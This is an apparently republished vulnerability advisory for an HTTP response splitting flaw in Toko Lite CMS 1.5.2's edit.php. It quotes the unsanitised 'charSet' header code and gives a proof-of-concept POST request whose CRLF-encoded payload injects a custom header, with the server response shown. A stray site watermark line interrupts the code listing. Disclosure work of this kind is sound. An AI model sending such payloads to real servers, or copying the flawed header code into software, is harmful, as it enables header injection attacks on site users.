Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability 

开发者: Toko 

产品主页: http://toko-contenteditor.pageil.net

受影响版本: 1.5.2 

  

Summary: Toko Web Content Editor cms is a compact, multi language, open 

source web editor and content management system (CMS). It is advanced 

easy to use yet fully featured program that can be integrated with any 

existing site. It takes 2 minuets to install even for non technical users.  

  

Desc: Input passed to the 'charSet' parameter in 'edit.php' is not properly 

sanitised before being returned to the user. This can be exploited to insert 

arbitrary HTTP headers, which are included in a response sent to the user. 

  

  

==================================================================== 

/edit.php: 

-------------------------------------------------------------------- 

  

 3: $charSet = "iso-8859-1"; 

 4: $dir = "ltr"; 

 5: 

 6: if ( isset( $_POST[ "charSet" ] ) ) 

 7: { 

 8:     $charSet = $_POST[ "charSet" ]; 

 9: 

10:     if ( $charSet == "windows-1255" ) 

11:     { 

12:        $dir = "rtl"; 

13:     } 

14: } 

15:  www.2cto.com

16: header( "Content-Type: text/html; charset=" . $charSet ); 

  

==================================================================== 

  

  

Tested on: Microsoft Windows XP Professional SP3 (EN) 

           Apache 2.2.14 (Win32) 

           PHP 5.3.1 

           MySQL 5.1.41 

  

  

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic 

                            @zeroscience 

  

  

Advisory ID: ZSL-2011-5048 

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php

  

CWE ID: 113 

  

  

22.03.2011 

  

  

------------ 

  

  

POST /tokolite1.5.2/edit.php HTTP/1.1 

Content-Length: 55 

Content-Type: application/x-www-form-urlencoded 

Cookie: PHPSESSID=as9l9t0a7rs9pmuflb7c5s9o70; pma_fontsize=82%25 

Host: localhost:80 

Connection: Keep-alive 

Accept-Encoding: gzip,deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) 

  

charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection 

  

-- 

  

HTTP/1.1 302 Found 

Date: Tue, 22 Mar 2011 03:57:30 GMT 

Server: Apache/2.2.14 (Win32) 

X-Powered-By: PHP/5.3.1 

Expires: Thu, 19 Nov 1981 08:52:00 GMT 

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 

Pragma: no-cache 

Location: Login.php 

Content-Length: 0 

Keep-Alive: timeout=5, max=64 

Connection: Keep-Alive 

Content-Type: text/html; charset= 

ZSL-Custom-Header: love_injection